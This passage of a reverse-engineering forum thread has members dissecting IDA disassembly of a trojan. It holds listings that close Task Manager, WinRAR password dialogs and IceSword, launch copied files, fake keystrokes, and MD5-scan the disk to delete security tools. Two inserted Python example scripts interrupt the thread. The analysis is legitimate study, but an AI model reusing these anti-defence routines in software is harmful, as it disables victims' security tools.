Post #26 (LV2, RANK:10)
The OP is really strong. Bookmarking to study...

Post #27 (LV8, RANK:130)
Good article, learning.

Post #28 (LV2, RANK:10)
Slowly learning, hoping to make progress soon.

Post #29 (LV13, RANK:420)
What is the virus's name? I clicked it,

Post #30 (LV2, RANK:10)
This part:
seg001:00409D02 call sub_408150
seg001:00409D02
......
seg001:00409DF9 push 4 ; dwFlags
seg001:00409DFB push 0 ; lpNewFileName
seg001:00409DFD lea eax, [ebp+var_28C]
seg001:00409E03 call GetSystemDirectory
seg001:00409E03
seg001:00409E08 lea eax, [ebp+var_28C]
seg001:00409E0E mov edx, offset s_Ravext_dll ; "RavExt.dll"
but in my IDA it shows as
seg000:00409D02 call sub_408150
seg000:00409D07 push 4 ; lpNewFileName
seg000:00409D09 lea eax, [ebp+var_270]
seg000:00409D0F call sub_406BF4
seg000:00409D14 push [ebp+var_270]
seg000:00409D1A mov eax, off_413514
seg000:00409D1F push dword ptr [eax]
seg000:00409D21 push offset dword_40A868
seg000:00409D26 lea eax, [ebp+var_26C]
seg000:00409D2C mov edx, 3
seg000:00409D31 call sub_403E0C
seg000:00409D36 mov eax, [ebp+var_26C]
seg000:00409D3C call sub_403F4C
seg000:00409D41 push eax
seg000:00409D42 lea eax, [ebp+var_278]
seg000:00409D48 call sub_406D94
seg000:00409D4D push [ebp+var_278]
seg000:00409D53 mov eax, off_413594
seg000:00409D58 push dword ptr [eax]
seg000:00409D5A push offset dword_40A878
seg000:00409D5F lea eax, [ebp+var_274]
seg000:00409D65 mov edx, 3
seg000:00409D6A call sub_403E0C
seg000:00409D6F mov eax, [ebp+var_274]
seg000:00409D75 call sub_403F4C
seg000:00409D7A push eax ; lpExistingFileName
seg000:00409D7B call MoveFileExA
seg000:00409D80 push 4 ; dwFlags
seg000:00409D82 lea eax, [ebp+lpNewFileName]
seg000:00409D88 call sub_406C98
seg000:00409D8D push [ebp+lpNewFileName] ; lpNewFileName
seg000:00409D93 mov eax, off_41356C
seg000:00409D98 push dword ptr [eax]
seg000:00409D9A push offset dword_40A868
seg000:00409D9F lea eax, [ebp+var_27C]
seg000:00409DA5 mov edx, 3
seg000:00409DAA call sub_403E0C
seg000:00409DAF mov eax, [ebp+var_27C]
seg000:00409DB5 call sub_403F4C
seg000:00409DBA push eax
seg000:00409DBB lea eax, [ebp+var_288]
seg000:00409DC1 call sub_406D94
seg000:00409DC6 push [ebp+var_288]
seg000:00409DCC mov eax, off_413594
seg000:00409DD1 push dword ptr [eax]
seg000:00409DD3 push offset dword_40A888
seg000:00409DD8 lea eax, [ebp+var_284]
seg000:00409DDE mov edx, 3
seg000:00409DE3 call sub_403E0C
seg000:00409DE8 mov eax, [ebp+var_284]
seg000:00409DEE call sub_403F4C
seg000:00409DF3 push eax ; lpExistingFileName
seg000:00409DF4 call MoveFileExA
seg000:00409DF9 push 4 ; dwFlags
seg000:00409DFB push 0 ; lpNewFileName
seg000:00409DFD lea eax, [ebp+var_28C]
seg000:00409E03 call sub_406D94
It is different from the OP's; what is the reason?
Also, this line of the OP's:
seg001:00409E0E mov edx, offset s_Ravext_dll ; "RavExt.dll"
shows in my IDA as:
seg000:00409E0E mov edx, offset dword_40A908
I would like to ask how offset s_Ravext_dll was obtained from dword_40A908?
Sorry to trouble you.

Post #31 (LV13, RANK:420)
Give me one without a packer.

Post #32 (LV13, RANK:420)
Found one:
seg000:0040F1AC ; =============== S U B R O U T I N E =======================================
seg000:0040F1AC
seg000:0040F1AC
seg000:0040F1AC sub_40F1AC proc near ; CODE XREF: sub_40F2EC+A35p
seg000:0040F1AC
seg000:0040F1AC hWnd = dword ptr -18h
seg000:0040F1AC var_14 = dword ptr -14h
seg000:0040F1AC
seg000:0040F1AC push ebx
seg000:0040F1AD push esi
seg000:0040F1AE push edi
seg000:0040F1AF push ebp
seg000:0040F1B0 add esp, 0FFFFFFF8h
seg000:0040F1B3 push 0 ; lpWindowName
seg000:0040F1B5 push offset aWinrarwindow ; "WinRarWindow"
seg000:0040F1BA call FindWindowA
seg000:0040F1BF mov ebx, eax
seg000:0040F1C1 push offset aFII ; "输入密码"
seg000:0040F1C6 push offset a32770 ; "#32770"
seg000:0040F1CB call FindWindowA
seg000:0040F1D0 mov esi, eax
seg000:0040F1D2 push offset aFIA ; "輸入密碼"
seg000:0040F1D7 push offset a32770 ; "#32770"
seg000:0040F1DC call FindWindowA
seg000:0040F1E1 mov edi, eax
seg000:0040F1E3 push offset aIFII ; "请输入密码"
seg000:0040F1E8 push offset a32770 ; "#32770"
seg000:0040F1ED call FindWindowA
seg000:0040F1F2 mov ebp, eax
seg000:0040F1F4 push offset aIFIA ; "請輸入密碼"
seg000:0040F1F9 push offset a32770 ; "#32770"
seg000:0040F1FE call FindWindowA
seg000:0040F203 mov [esp+18h+hWnd], eax
seg000:0040F206 push offset aEnterPassword ; "Enter password"
seg000:0040F20B push offset a32770 ; "#32770"
seg000:0040F210 call FindWindowA
seg000:0040F215 mov [esp+18h+var_14], eax
seg000:0040F219 test ebx, ebx
seg000:0040F21B jz short loc_40F22D
seg000:0040F21D test esi, esi
seg000:0040F21F jz short loc_40F22D
seg000:0040F221 push 0 ; lParam
seg000:0040F223 push 0 ; wParam
seg000:0040F225 push 10h ; Msg
seg000:0040F227 push esi ; hWnd
seg000:0040F228 call PostMessageA
seg000:0040F22D
seg000:0040F22D loc_40F22D: ; CODE XREF: sub_40F1AC+6Fj
seg000:0040F22D ; sub_40F1AC+73j
seg000:0040F22D test ebx, ebx
seg000:0040F22F jz short loc_40F241
seg000:0040F231 test edi, edi
seg000:0040F233 jz short loc_40F241
seg000:0040F235 push 0 ; lParam
seg000:0040F237 push 0 ; wParam
seg000:0040F239 push 10h ; Msg
seg000:0040F23B push edi ; hWnd
seg000:0040F23C call PostMessageA
seg000:0040F241
seg000:0040F241 loc_40F241: ; CODE XREF: sub_40F1AC+83j
seg000:0040F241 ; sub_40F1AC+87j
seg000:0040F241 test ebx, ebx
seg000:0040F243 jz short loc_40F255
seg000:0040F245 test ebp, ebp
seg000:0040F247 jz short loc_40F255
seg000:0040F249 push 0 ; lParam
seg000:0040F24B push 0 ; wParam
seg000:0040F24D push 10h ; Msg
seg000:0040F24F push ebp ; hWnd
seg000:0040F250 call PostMessageA
seg000:0040F255
seg000:0040F255 loc_40F255: ; CODE XREF: sub_40F1AC+97j
seg000:0040F255 ; sub_40F1AC+9Bj
seg000:0040F255 test ebx, ebx
seg000:0040F257 jz short loc_40F26F
seg000:0040F259 cmp [esp+18h+hWnd], 0
seg000:0040F25D jz short loc_40F26F
seg000:0040F25F push 0 ; lParam
seg000:0040F261 push 0 ; wParam
seg000:0040F263 push 10h ; Msg
seg000:0040F265 mov eax, [esp+24h+hWnd]
seg000:0040F269 push eax ; hWnd
seg000:0040F26A call PostMessageA
seg000:0040F26F
seg000:0040F26F loc_40F26F: ; CODE XREF: sub_40F1AC+ABj
seg000:0040F26F ; sub_40F1AC+B1j
seg000:0040F26F test ebx, ebx
seg000:0040F271 jz short loc_40F28A
seg000:0040F273 cmp [esp+18h+var_14], 0
seg000:0040F278 jz short loc_40F28A
seg000:0040F27A push 0 ; lParam
seg000:0040F27C push 0 ; wParam
seg000:0040F27E push 10h ; Msg
seg000:0040F280 mov eax, [esp+24h+var_14]
seg000:0040F284 push eax ; hWnd
seg000:0040F285 call PostMessageA
seg000:0040F28A
seg000:0040F28A loc_40F28A: ; CODE XREF: sub_40F1AC+C5j
seg000:0040F28A ; sub_40F1AC+CCj
seg000:0040F28A pop ecx
seg000:0040F28B pop edx
seg000:0040F28C pop ebp
seg000:0040F28D pop edi
seg000:0040F28E pop esi
seg000:0040F28F pop ebx
seg000:0040F290 retn
seg000:0040F290 sub_40F1AC endp
If it finds WinRAR's set-password window, it closes it.

Post #33 (LV13, RANK:420)
Can't find how it kills IceSword.

Post #34 (LV13, RANK:420)
seg000:0040C372 push 0 ; lParam
seg000:0040C374 push 0 ; wParam
seg000:0040C376 push 10h ; Msg
seg000:0040C378 push offset WindowName ; "Windows 任?
seg000:0040C37D push offset a32770_0 ; "#32770"
seg000:0040C382 call FindWindowA
seg000:0040C387 push eax ; hWnd
seg000:0040C388 call PostMessageA
If it finds Task Manager, it closes it.

Post #35 (LV2, RANK:140)
Really diligent~~~
Still working on this so late!

Post #38 (LV2, RANK:10)
Brilliant~~

Post #39 (LV2, RANK:10)
Is this the part that kills IceSword?
seg000:0040C470 ; =============== S U B R O U T I N E =======================================
seg000:0040C470
seg000:0040C470 ; Attributes: bp-based frame
seg000:0040C470
seg000:0040C470 sub_40C470 proc near ; DATA XREF: seg000:00412283o
seg000:0040C470
seg000:0040C470 var_18 = dword ptr -18h
seg000:0040C470 var_14 = dword ptr -14h
seg000:0040C470 var_10 = dword ptr -10h
seg000:0040C470 var_C = dword ptr -0Ch
seg000:0040C470 var_8 = dword ptr -8
seg000:0040C470 var_4 = dword ptr -4
seg000:0040C470
seg000:0040C470 push ebp
seg000:0040C471 mov ebp, esp
seg000:0040C473 xor ecx, ecx
seg000:0040C475 push ecx
seg000:0040C476 push ecx
seg000:0040C477 push ecx
seg000:0040C478 push ecx
seg000:0040C479 push ecx
seg000:0040C47A push ecx
seg000:0040C47B push ebx
seg000:0040C47C push esi
seg000:0040C47D push edi
seg000:0040C47E xor eax, eax
seg000:0040C480 push ebp
seg000:0040C481 push offset loc_40C5DF
seg000:0040C486 push dword ptr fs:[eax]
seg000:0040C489 mov fs:[eax], esp
seg000:0040C48C xor eax, eax
seg000:0040C48E push ebp
seg000:0040C48F push offset loc_40C5BA
seg000:0040C494 push dword ptr fs:[eax]
seg000:0040C497 mov fs:[eax], esp
seg000:0040C49A push offset aIcesword ; "IceSword"
seg000:0040C49F push 0 ; lpClassName
seg000:0040C4A1 call FindWindowA
seg000:0040C4A6 mov edx, off_4134E8
seg000:0040C4AC mov [edx], eax
seg000:0040C4AE mov eax, off_4134E8
seg000:0040C4B3 cmp dword ptr [eax], 0
seg000:0040C4B6 jz short loc_40C4EC
seg000:0040C4B8 push 0 ; lParam
seg000:0040C4BA push 0 ; wParam
seg000:0040C4BC push 12h ; Msg
seg000:0040C4BE mov eax, off_4134E8
seg000:0040C4C3 mov eax, [eax]
seg000:0040C4C5 push eax ; hWnd
seg000:0040C4C6 call PostMessageA
seg000:0040C4CB push 64h ; dwMilliseconds
seg000:0040C4CD call Sleep
seg000:0040C4D2 push 0 ; dwExtraInfo
seg000:0040C4D4 push 0 ; dwFlags
seg000:0040C4D6 push 0 ; bScan
seg000:0040C4D8 push 0Dh ; bVk
seg000:0040C4DA call keybd_event
seg000:0040C4DF push 0 ; dwExtraInfo
seg000:0040C4E1 push 2 ; dwFlags
seg000:0040C4E3 push 0 ; bScan
seg000:0040C4E5 push 0Dh ; bVk
seg000:0040C4E7 call keybd_event
seg000:0040C4EC
seg000:0040C4EC loc_40C4EC: ; CODE XREF: sub_40C470+46j
seg000:0040C4EC lea eax, [ebp+var_8]
seg000:0040C4EF call sub_406D94
seg000:0040C4F4 push [ebp+var_8]
seg000:0040C4F7 mov eax, off_413514
seg000:0040C4FC push dword ptr [eax]
seg000:0040C4FE push offset dword_40C604
seg000:0040C503 lea eax, [ebp+var_4]
seg000:0040C506 mov edx, 3
seg000:0040C50B call sub_403E0C
seg000:0040C510 mov eax, [ebp+var_4]
seg000:0040C513 call sub_406F54
seg000:0040C518 test al, al
seg000:0040C51A jnz loc_40C5B0
seg000:0040C520 push 0 ; lParam
seg000:0040C522 push 0 ; wParam
seg000:0040C524 push 10h ; Msg
seg000:0040C526 push offset aWindows_0 ; "Windows 任?
seg000:0040C52B push offset a32770_1 ; "#32770"
seg000:0040C530 call FindWindowA
seg000:0040C535 push eax ; hWnd
seg000:0040C536 call PostMessageA
seg000:0040C53B push 0FFFFFFFFh ; bFailIfExists
seg000:0040C53D lea eax, [ebp+var_10]
seg000:0040C540 call sub_406D94
seg000:0040C545 push [ebp+var_10]
seg000:0040C548 mov eax, off_413514
seg000:0040C54D push dword ptr [eax]
seg000:0040C54F push offset dword_40C604
seg000:0040C554 lea eax, [ebp+var_C]
seg000:0040C557 mov edx, 3
seg000:0040C55C call sub_403E0C
seg000:0040C561 mov eax, [ebp+var_C]
seg000:0040C564 call sub_403F4C
seg000:0040C569 push eax ; lpNewFileName
seg000:0040C56A mov eax, off_413568
seg000:0040C56F mov eax, [eax]
seg000:0040C571 call sub_403F4C
seg000:0040C576 push eax ; lpExistingFileName
seg000:0040C577 call CopyFileA
seg000:0040C57C push 1 ; uCmdShow
seg000:0040C57E lea eax, [ebp+var_18]
seg000:0040C581 call sub_406D94
seg000:0040C586 push [ebp+var_18]
seg000:0040C589 mov eax, off_413514
seg000:0040C58E push dword ptr [eax]
seg000:0040C590 push offset dword_40C604
seg000:0040C595 lea eax, [ebp+var_14]
seg000:0040C598 mov edx, 3
seg000:0040C59D call sub_403E0C
seg000:0040C5A2 mov eax, [ebp+var_14]
seg000:0040C5A5 call sub_403F4C
seg000:0040C5AA push eax ; lpCmdLine
seg000:0040C5AB call WinExec
seg000:0040C5B0
seg000:0040C5B0 loc_40C5B0: ; CODE XREF: sub_40C470+AAj
seg000:0040C5B0 xor eax, eax
seg000:0040C5B2 pop edx
seg000:0040C5B3 pop ecx
seg000:0040C5B4 pop ecx
seg000:0040C5B5 mov fs:[eax], edx
seg000:0040C5B8 jmp short loc_40C5C4
seg000:0040C5BA ; ---------------------------------------------------------------------------
seg000:0040C5BA
seg000:0040C5BA loc_40C5BA: ; DATA XREF: sub_40C470+1Fo
seg000:0040C5BA jmp loc_403538
seg000:0040C5BF ; ---------------------------------------------------------------------------
seg000:0040C5BF call sub_4036F0
seg000:0040C5C4
seg000:0040C5C4 loc_40C5C4: ; CODE XREF: sub_40C470+148j
seg000:0040C5C4 xor eax, eax
seg000:0040C5C6 pop edx
seg000:0040C5C7 pop ecx
seg000:0040C5C8 pop ecx
seg000:0040C5C9 mov fs:[eax], edx
seg000:0040C5CC push offset loc_40C5E6
seg000:0040C5D1
seg000:0040C5D1 loc_40C5D1: ; CODE XREF: sub_40C470+174j
seg000:0040C5D1 lea eax, [ebp+var_18]
seg000:0040C5D4 mov edx, 6
seg000:0040C5D9 call sub_403BEC
seg000:0040C5DE retn
seg000:0040C5DF ; ---------------------------------------------------------------------------
seg000:0040C5DF
seg000:0040C5DF loc_40C5DF: ; DATA XREF: sub_40C470+11o
seg000:0040C5DF jmp loc_403664
seg000:0040C5E4 ; ---------------------------------------------------------------------------
seg000:0040C5E4 jmp short loc_40C5D1
seg000:0040C5E6 ; ---------------------------------------------------------------------------
seg000:0040C5E6
seg000:0040C5E6 loc_40C5E6: ; CODE XREF: sub_40C470+16Ej
seg000:0040C5E6 ; DATA XREF: sub_40C470+15Co
seg000:0040C5E6 pop edi
seg000:0040C5E7 pop esi
seg000:0040C5E8 pop ebx
seg000:0040C5E9 mov esp, ebp
seg000:0040C5EB pop ebp
seg000:0040C5EC retn 10h
seg000:0040C5EC sub_40C470 endp
seg000:0040C5EC
seg000:0040C5EC ; ----------------------------------------------------------------

Post #40 (LV13, RANK:420)
Probably not. IceSword's class name and title are both random, and later in the code there should be a simulated click on the "Yes" button, but there isn't one.

Post #41 (LV13, RANK:420)
seg001:0040DB5D push 1 ; lParam
seg001:0040DB5F push 0F060h ; wParam
seg001:0040DB64 push 112h ; Msg
seg001:0040DB69 push ebx ; hWnd
seg001:0040DB6A call SendMessageA
Is this minimizing the window? Why doesn't the version I wrote in C++ do it?
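An added example, not code from this thread or from the trojan's author, for reading call sequences like the one above (and the ones in posts 32, 34 and 39): the Win32 APIs here are stdcall, so arguments are pushed right to left and the push nearest the call is the first parameter. The script recovers each call's argument list from the IDA text and decodes the message constants from winuser.h (WM_CLOSE = 0x10, WM_QUIT = 0x12, WM_SYSCOMMAND = 0x112, SC_MINIMIZE = 0xF020, SC_CLOSE = 0xF060). Note that 0F060h is SC_CLOSE, not SC_MINIMIZE, so the SendMessageA in this snippet asks the window to close. The two listing snippets embedded below are copied from this thread; the argument-count table only covers the APIs that appear in the thread's listings, and the truncated Task Manager title string is left as "Windows ...".

```python
"""Recover stdcall arguments from IDA listing text (added example, not from the thread)."""
import re
from typing import Dict, List, Optional

# Stack-argument counts from the documented Win32 prototypes; only APIs seen in this thread.
ARG_COUNTS: Dict[str, int] = {
    "FindWindowA": 2, "PostMessageA": 4, "SendMessageA": 4, "keybd_event": 4,
    "MapVirtualKeyA": 2, "Sleep": 1, "WinExec": 2, "CopyFileA": 3, "MoveFileExA": 3,
}
# Window-message and system-command constants from winuser.h.
MESSAGES = {0x0010: "WM_CLOSE", 0x0012: "WM_QUIT", 0x0112: "WM_SYSCOMMAND"}
SYSCOMMANDS = {0xF020: "SC_MINIMIZE", 0xF060: "SC_CLOSE"}

# "seg001:0040DB5D push 1 ; lParam" -> mnemonic, operands, optional comment
INSN_RE = re.compile(
    r"^\s*seg\d+:[0-9A-Fa-f]{8}\s+(?P<mnem>[a-z_]+)\s*(?P<ops>[^;]*?)\s*(?:;\s*(?P<comment>.*))?$"
)


def parse_imm(operand: str) -> Optional[int]:
    """IDA immediates: '10h' / '0F060h' are hex, '4' is decimal; registers and memory give None."""
    m = re.fullmatch(r"([0-9A-Fa-f]+)h", operand)
    if m:
        return int(m.group(1), 16)
    return int(operand) if operand.isdigit() else None


def decode(api: str, args: List[str]) -> str:
    """Summarise the window-message APIs in readable form; other APIs get an empty string."""
    if api in ("PostMessageA", "SendMessageA"):
        msg = parse_imm(args[1])
        name = MESSAGES.get(msg, args[1]) if msg is not None else args[1]
        if name == "WM_SYSCOMMAND":
            sc = parse_imm(args[2])
            name += " " + (SYSCOMMANDS.get(sc, args[2]) if sc is not None else args[2])
        return f"{name} -> {args[0]}"
    if api == "FindWindowA":
        return f"class={args[0]} title={args[1]}"
    return ""


def recover_calls(listing: str) -> List[dict]:
    """Walk the listing and pair each known call with the pushes that feed it."""
    pending: List[str] = []          # operands pushed but not yet consumed by a call
    last_call: Optional[str] = None  # set right after a call so a following 'push eax' is labelled
    calls: List[dict] = []
    for line in listing.splitlines():
        m = INSN_RE.match(line)
        if not m:
            continue
        mnem, ops = m.group("mnem"), m.group("ops").strip()
        if mnem == "push":
            if ops == "eax" and last_call:
                ops = f"eax (return of {last_call})"
            pending.append(ops)
            last_call = None
        elif mnem == "call":
            n = ARG_COUNTS.get(ops)
            if n is not None:
                if len(pending) < n:
                    raise ValueError(f"{ops}: expected {n} pushes, found {len(pending)}")
                # stdcall pushes right to left, so the last push is the first parameter
                args = pending[-n:][::-1]
                del pending[-n:]
                calls.append({"api": ops, "args": args, "decoded": decode(ops, args)})
            last_call = ops
        else:
            last_call = None
    return calls


# Snippets copied from this thread (posts 41 and 34); the title string is truncated on the page.
POST41 = """
seg001:0040DB5D push 1 ; lParam
seg001:0040DB5F push 0F060h ; wParam
seg001:0040DB64 push 112h ; Msg
seg001:0040DB69 push ebx ; hWnd
seg001:0040DB6A call SendMessageA
"""
POST34 = """
seg000:0040C372 push 0 ; lParam
seg000:0040C374 push 0 ; wParam
seg000:0040C376 push 10h ; Msg
seg000:0040C378 push offset WindowName ; "Windows ..."
seg000:0040C37D push offset a32770_0 ; "#32770"
seg000:0040C382 call FindWindowA
seg000:0040C387 push eax ; hWnd
seg000:0040C388 call PostMessageA
"""

if __name__ == "__main__":
    for snippet in (POST41, POST34):
        for c in recover_calls(snippet):
            print(f"{c['api']}({', '.join(c['args'])})  {c['decoded']}")
```

The unconsumed pushes are deliberately kept across calls: in the post 34 snippet the three PostMessageA arguments are pushed before FindWindowA is called, and only the window handle (`push eax`) is added afterwards, which the recovery reproduces.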

Post #42 (LV9, RANK:680)
Minimizing the window should be the mapping of the keyboard's Win+M:
seg001:004112DC push 0 ; dwExtraInfo
seg001:004112DE push 0 ; dwFlags
seg001:004112E0 push 0 ; uMapType
seg001:004112E2 push 5Bh ; uCode 5Bh is the left Windows logo key
seg001:004112E4 call MapVirtualKeyA
seg001:004112E4
seg001:004112E9 push eax ; bScan
seg001:004112EA push 5Bh ; bVk
seg001:004112EC call keybd_event
seg001:004112EC
seg001:004112F1 push 0 ; dwExtraInfo
seg001:004112F3 push 0 ; dwFlags
seg001:004112F5 push 0 ; uMapType
seg001:004112F7 push 4Dh ; uCode 4Dh is "M"
seg001:004112F9 call MapVirtualKeyA
......
Secondly, the way this trojan deals with tools such as Wsys and IceSword is mainly by checking every exe file on the whole hard disk against MD5 feature codes; if it finds an exe whose MD5 matches the one the trojan has preset, it takes that as IceSword and force-deletes it.
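An added example of the MD5 feature-code check described above (my own code, not the trojan's and not code from the thread): it walks a directory tree, hashes every file with an executable extension and reports any whose digest is in a preset set. The sample tree and the "IceSword stand-in" file contents are constructed in a temp directory so the script runs offline; no real hash of IceSword is used. The patched copy shows the weakness of this kind of feature code: changing a single byte (repacking, or the tool's author shipping a new build) yields a different MD5 and the scan misses it, which is also why a defender's hash-based IOC sweep needs other indicators alongside it.

```python
"""Hash-based 'feature code' scan over a directory tree (added example, not the trojan's code)."""
import hashlib
import shutil
import tempfile
from pathlib import Path
from typing import Iterable, List, Set, Tuple

EXECUTABLE_SUFFIXES = (".exe",)


def md5_of_file(path: Path, chunk_size: int = 1 << 16) -> str:
    """Stream the file through MD5 so large executables do not have to fit in memory."""
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def scan_tree(root: Path, feature_codes: Set[str],
              suffixes: Iterable[str] = EXECUTABLE_SUFFIXES) -> List[Tuple[str, str]]:
    """Return (path, md5) for every file under root whose suffix matches and whose MD5 is listed."""
    hits: List[Tuple[str, str]] = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            digest = md5_of_file(path)
            if digest in feature_codes:
                hits.append((str(path), digest))
    return hits


def build_demo_tree() -> Tuple[Path, Set[str]]:
    """Constructed sample tree: a stand-in tool binary, a one-byte-patched copy, and bystanders."""
    root = Path(tempfile.mkdtemp(prefix="featurecode_"))
    tool = b"MZ" + b"\x90" * 64 + b"constructed IceSword stand-in"  # not a real PE, just bytes
    tools = root / "Program Files" / "tools"
    tools.mkdir(parents=True)
    (tools / "IceSword.exe").write_bytes(tool)
    (tools / "IceSword_patched.exe").write_bytes(tool[:-1] + b"!")  # one byte differs
    (root / "notepad.exe").write_bytes(b"MZ" + b"\x00" * 32)        # unrelated executable
    (root / "readme.txt").write_bytes(tool)                           # same bytes, wrong suffix
    feature_codes = {md5_of_file(tools / "IceSword.exe")}             # the "preset" MD5
    return root, feature_codes


def demo() -> List[str]:
    """Build the tree, scan it, clean up, and return the base names that matched."""
    root, feature_codes = build_demo_tree()
    try:
        return [Path(p).name for p, _ in scan_tree(root, feature_codes)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    # Only IceSword.exe matches; the patched copy and readme.txt are skipped.
    print("matched:", demo())
```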

Post #43 (LV2, RANK:10)
Good article, learning.

Post #44 (LV2, RANK:10)
Every time I analyze a trojan or virus, I gain a deeper understanding of the system. Amazing.

Post #45 (LV2, RANK:10)
Simulating keystrokes to uninstall the antivirus, what an interesting idea.

Post #46 (LV3, RANK:20)
Awesome, really awesome.

Post #47 (LV13, RANK:350)
I really want to; I have always been very interested in trojans.

Post #48 (LV2, RANK:10)
It really is a good article.

Post #49 (LV2, RANK:10)
Very good, very powerful.....

Post #50 (LV2, RANK:10)
Rising really is going to get dismissed.